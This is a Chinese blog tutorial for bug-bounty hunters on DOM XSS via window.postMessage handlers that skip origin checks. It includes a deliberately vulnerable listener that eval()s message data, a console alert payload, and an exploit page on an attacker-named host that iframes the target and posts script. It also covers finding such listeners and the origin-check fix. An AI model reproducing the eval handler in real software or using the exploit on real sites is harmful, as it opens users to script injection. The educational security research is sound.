postMessage引发XSS

最新推荐文章于 2024-05-27 13:58:43 发布
最新推荐文章于 2024-05-27 13:58:43 发布
阅读量1.3k 收藏 8
点赞数 1
文章标签: xss 前端 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52501704/article/details/130898920
版权

这次的主题是postMessage未验证消息来源origin,导致恶意代码注入的dom-xss,由于很少人关注这类型的注入,因为挖掘难度中等,需要一定的javascript代码审计能力,且漏洞危害等级不高,导致国内许多SRC都存在跨域消息传输xss注入漏洞。比较小型的SRC会忽略,但大型的SRC会收此类漏洞,我去年挖到最高赏金的是1250软妹币,对于xss级别漏洞来说,奖励还算厚道。

什么是postMessage?


GPT是这样回答的

Ai就是Ai,解释莫得感情,可能有点抽象,我来盘活一下。

先上简单的demo1.html

<html><title>dom-xss show time</title><body>
<h1>演示</h1>
<script>// 接收方页面window.addEventListener("message", function(event) {  console.log("有人约我了!他对我说:",event.data)    var message = event.data;    eval(message)});</script></body></html>

这段代码添加了message事件监听功能,其作用就是监听来自其他域的消息,并且使用eval方法处理这条消息。

应用场景:

a.com和b.com属于不同域,现在需要在a.com下面嵌套b.com的页面,并且实现消息传输,传什么消息呢?比如,a.com告诉b.com跳转到b.com的登录页面,这时候postMessage就派上用场了。



原理你可能看得有点烦,现在直接教你如何挖掘这种漏洞。

 

漏洞复现

1.打开demo1.html,打开浏览器的F12,在eval(message)这行代码这里打上断点,console输入代码:postMessage("alert('靓仔')","*")

此时补充下postMessage的参数含义:

postMessage(message, targetOrigin)

一般只需要修改message和targetOrigin两个参数,targetOrigin为星号的时候表示不指定消息接收的origin,通配所有域。
 

输入代码后摁回车,此时断点卡住,message事件收到message并执行eval,弹窗。
 

有人会讲,这不是self-xss吗?

其实有src的审核曾经把这个当做self-xss,可能是没见过,我们上一个exp:


攻击场景:

https://attacker.captainxu.repl.co,用来挂载exp,代码如下:

<!DOCTYPE html>
<head>  <meta charset="utf-8">  <meta name="viewport" content="width=device-width">  <title>攻击站点</title>  <link href="style.css" rel="stylesheet" type="text/css" /></head><h1>Exp页面</h1>
<body>  <iframe id="target"></iframe>
  <script>    var target = document.getElementById("target");    target.addEventListener('load', () => {      target.contentWindow.postMessage('alert("靓仔")', '*')    })
    target.src = "https://target.captainxu.repl.co"</script></body>
</html>


https://target.captainxu.repl.co,存在漏洞的网站
代码如下:

<html><title>dom-xss show time</title>
<body>
  <h1>漏洞网站</h1>
  <script>    // 接收方页面    window.addEventListener("message", function (event) {      console.log("有人约我了!他对我说:", event.data)      var message = event.data;      eval(message)    });</script></body>
</html>

上面的效果就是attacker使用iframe嵌套target站点,然后attacker通过postMessage向target实现恶意代码注入。

漏洞挖掘技巧

如何去挖这种隐藏比较深的漏洞,这里强推一个国外白帽写的谷歌浏览器插件:
https://github.com/fransr/postMessage-tracker
安装之后,只要是当前页面创建了message事件监听,这个插件就会定位到其代码。

但是请记住一点,插件只是辅助,并不能直接找到漏洞,漏洞的挖掘还是得需要去审计javascript代码。

 

漏洞防护

漏洞防护也比较简单,一般都是验证消息来源的origin,比如a.com的源码中只接收b.com的消息,不是b.com发来的消息不进行任何处理。如下图


看到验证origin的可以直接忽略,有时也会存在绕过,具体情况具体分析。

思路升级

曾经思考,这种类型的漏洞,能不能批量检测?

答案当然是可以的。

不过需要使用到高阶的javascript语法树(AST)去实现。我写过插件,效果并不是很明显,于是我想了另一个方法,那就是使用正则表达式简单粗暴地去检测源码中是否存在message这个关键词,如果存在,再人工进行核实。这种方法常常能发现意外收获。

好了,收~~~~~工!!!

H1111B
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试-postmessage xss
cdyunaq的博客
04-02 5748
介绍 看国外好多这种漏洞,刚好挖掘某 SRC 的时候也发现了类似的点,所以觉得还是有必要记录一下 介绍 postMessage()方法用于安全地实现跨源通信。 参考 1:https://www.runoob.com/js/met-win-postmessage.html 参考 2:https://developer.mozilla.org/zh-CN/docs/Web/API/Window/postMessage 语法 我感觉就是给数据发送到 window 中,就这么简单。 ..
创建子窗口与子父窗口间通信
04-22
- 为了安全,使用`postMessage`时应验证`event.origin`以确保消息来自预期的源。 - 避免过度依赖cookies或URL参数,因为它们可能会引发安全问题或不适用于大量数据传输。 - 在处理用户输入时,务必进行验证和过滤,...
PostMessage xss学习和挖掘
玲珑安全的博客
05-03 42
  PostMessage xss很有趣,在国外出现了很多次,国内src/众测从没遇到过,挖到过。可能境界还不够,有机会再去试试。好几年前记得心血来潮学过一次,都是半知半解,后来因为重要性不高,不了了之了,今天重新捡起来。   PostMessage的含义:参考MDN: Window.postmessage()方法可以安全地实现Window对象之间的跨源通信;例如,在页面和它派生的弹出窗口之间...
MessageChannelTracker:此chrome扩展程序记录了所有通过MessageChannel API发送到控制台的消息
05-27
MessageChannelTracker 该Chrome扩展程序将通过发送和接收的所有消息记录到控制台。 除了postMessage日志记录和调试之外,Channel Messaging API在某些Web应用程序中可能也起着重要作用。 使用常规的postMessage日志记录工具,您将看不到与Channel Messaging API交换的消息。 但是,这些消息可能与与postMessage API交换的消息一样重要。 因此,强烈建议安装Channel Messaging API日志记录工具,以确保不会错过在两个或更多框架之间交换的任何消息。 安装 git clone https://github.com/iphoneintosh/MessageChannelTracker 在Chrome中,转到chrome:// extensions / 在右上方启用开发者模式 加载解压缩的扩
Web安全XSS跨站脚本攻击_超链接xss(2)
2401_84297944的博客
04-28 595
点击“write”按钮后,会在当前页面插入一个超链接,其地址为文本框的内容。
前端常见跨域解决方案(jsonp,cors,proxy,postMessage,webSocket)
程展威的博客
05-29 2911
前端常见跨域解决方案:jsonp,cors,proxy,postMessage,webSocket详解及用法
postmessage xss利用
最新发布
2401_84466336的博客
05-27 776
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。假如我们可控origin,后面也会调用jquery中对象的text()方法,这个方法是自带有实体化编码的,所以就算绕过了也利用不了。刚才我们的举例,其实是相当于伪造了发送端,然后目标为接收端,接收端对数据没有正确处理,从而导致了XSS漏洞。前面说了,出现XSS,是因为window对发送的数据处理不当造成的,咱们分析一下这里的接收数据页面。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料。
通过HackerOne漏洞报告学习PostMessage漏洞实战场景中的利用与绕过
weixin_50464560的博客
08-13 1269
转载https://www.anquanke.com/post/id/219088   0x00 前言 这是一篇关于postMessage漏洞分析的文章,主要通过hackerone平台披露的Bug Bounty报告,学习和分析postMessage漏洞如何在真实的场景中得到利用的。   0x01 什么是PostMessage 根据Mozilla开发文档描述: The window.postMessage() method safely enables cross-origin comm
postMessage跨域通信中发现的Facebook DOM XSS .pdf
09-05
这些数据在事件监听器中处理时,如果没有得到充分的保护,可以被解析为可执行的JavaScript代码,从而引发XSS攻击。 **安全对抗策略** 1. **数据过滤与转义**:接收到的任何外部数据都应被视为不可信,必须经过严格...
跨域资源那些事.pdf
08-08
然而,JSONP的安全性依赖于服务器端的正确实现,一旦出现错误,可能会引发XSS攻击。因此,服务器应限制返回的JSONP回调函数名称,避免执行恶意代码。 此外,跨域问题还涉及其他HTTP头部,如Content-Type。不当设置...
jbii:基于 Jade 的 Iframe 注入
06-22
2. **安全性**:Iframe中的内容可能会引发XSS攻击,因此要谨慎处理用户输入,并使用`sandbox`属性。 3. **性能影响**:加载Iframe会增加页面的请求数量,可能影响页面加载速度,合理使用缓存和预加载策略可以优化。...
【技术分享】梨子带你刷burpsuite靶场系列之客户端漏洞篇 – 基于DOM的漏洞 .pdf
09-05
此外,Web消息也能成为source,如果网站在处理Web消息时不进行适当验证,恶意iframe可以使用postMessage()方法将数据传递给事件监听器,进而利用sink执行恶意操作。 要构建基于Web消息的攻击,可以创建一个含有事件...
PostMessage跨域漏洞
weixin_50464560的博客
08-13 658
背景价值: $3000漏洞原因:postMessage跨域漏洞导致,利用websocket接收用户认证tokenHacking Slack using postMessage and WebSocket-reconnect to steal your precious token基础知识在了解这个漏洞的时候我们需要了解以下基础的知识:PostMessagePostMessagePostMessage API是一个很简单的实现跨域的方法,最基本的使用方法是:B站的data数据,发送数据端parent.post
ocx控件 postmessage消息会消失_通过HackerOne漏洞报告学习PostMessage漏洞实战场景中的利用与绕过...
weixin_39863616的博客
11-30 300
0x00 前言这是一篇关于postMessage漏洞分析的文章,主要通过hackerone平台披露的Bug Bounty报告,学习和分析postMessage漏洞如何在真实的场景中得到利用的。0x01 什么是PostMessage根据Mozilla开发文档描述:The window.postMessage() method safely enables cross-origin comm...
window.postMessage()接收不到信息(失效)
码农桃子的博客
04-18 4116
由于我这里的子窗口调用的是其他公司的页面,所以就不让他们改了。所以,我们可以先通过F12看一下2个通信窗口的位置,确保位置正确,再决定使用什么window对象。那么有人可能会问了,如果父子页面都是自己写的,自己方便改,能不能不通过parent进行通信呢?,比如我项目中,其实是2个iframe在通信,按照上面的通信方式,无法直接监听到。按照正常的代码逻辑,应该是这个样子,通过iframe打开子窗口,能够正常通信。才可以保持通信,比如上面的案例就是间接的父子关系。,具体原因不知道,因为我尝试了一下,结果不行。
网络安全——XSS跨站脚本攻击
weixin_54055099的博客
09-16 4226
XSS跨站脚本攻击,DVWA靶机的三种类型三个等级的操作
前端-基于客户端DOM的XSS代码注入
.伊泽瑞尔
07-14 301
前端-基于客户端DOM的XSS代码注入 postmessage引起的,ajax数据请求引起的
pikachu之xss漏洞学习
weixin_38720471的博客
01-24 1954
1简介 XSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户 XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制 攻击流程# 假设存在漏洞的是一个论坛,攻击者将恶意的JS代码通过XSS漏洞插入到论文的某一页面中 当用户访问这个页面时,都会执行这个恶意的JS代码,这个代码就会在用户的浏览器端执行 XSS攻击类型# 危害:存储型 > 反射型 > DOM型 反射型:交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存
postMessage 使用
06-07
`postMessage` 方法可以用于在不同的窗口或 iframe 之间进行安全的跨域通信。它能够向指定窗口发送一个消息,并且在接收窗口中设置一个监听器来接收该消息。 `postMessage` 方法的基本语法如下: ```javascript otherWindow.postMessage(message, targetOrigin, [transfer]); ``` 其中,`otherWindow` 表示指定的窗口或 iframe,`message` 表示要发送的消息,`targetOrigin` 表示接收消息的窗口的源(如果不指定,表示不限制源),`transfer` 表示要传递的数据(可选)。 例如,下面的代码可以向指定的窗口发送一个消息: ```javascript var otherWindow = window.open('http://example.com/'); otherWindow.postMessage('Hello, world!', 'http://example.com'); ``` 在上面的代码中,我们首先使用 `window.open` 方法打开了一个新的窗口,并将其引用赋值给了 `otherWindow` 变量。然后,我们使用 `postMessage` 方法向该窗口发送了一个消息。由于指定的源为 `http://example.com`,因此只有来自 `http://example.com` 源的窗口才能接收到该消息。 接收窗口可以使用以下代码来监听消息: ```javascript window.addEventListener('message', function(event) { if (event.origin !== 'http://example.com') { return; } console.log(event.data); }); ``` 在上面的代码中,我们使用 `addEventListener` 方法向当前窗口添加了一个监听器,用于监听 `message` 事件。当接收到事件时,我们首先检查消息的源是否为 `http://example.com`,如果不是,则直接返回。否则,我们就可以使用 `event.data` 属性来获取消息内容,并进行相应的处理。 需要注意的是,`postMessage` 方法虽然可以进行跨域通信,但也存在一定的安全风险。因此,在使用时需要仔细考虑安全问题,并避免发生跨站点脚本(XSS)攻击等问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值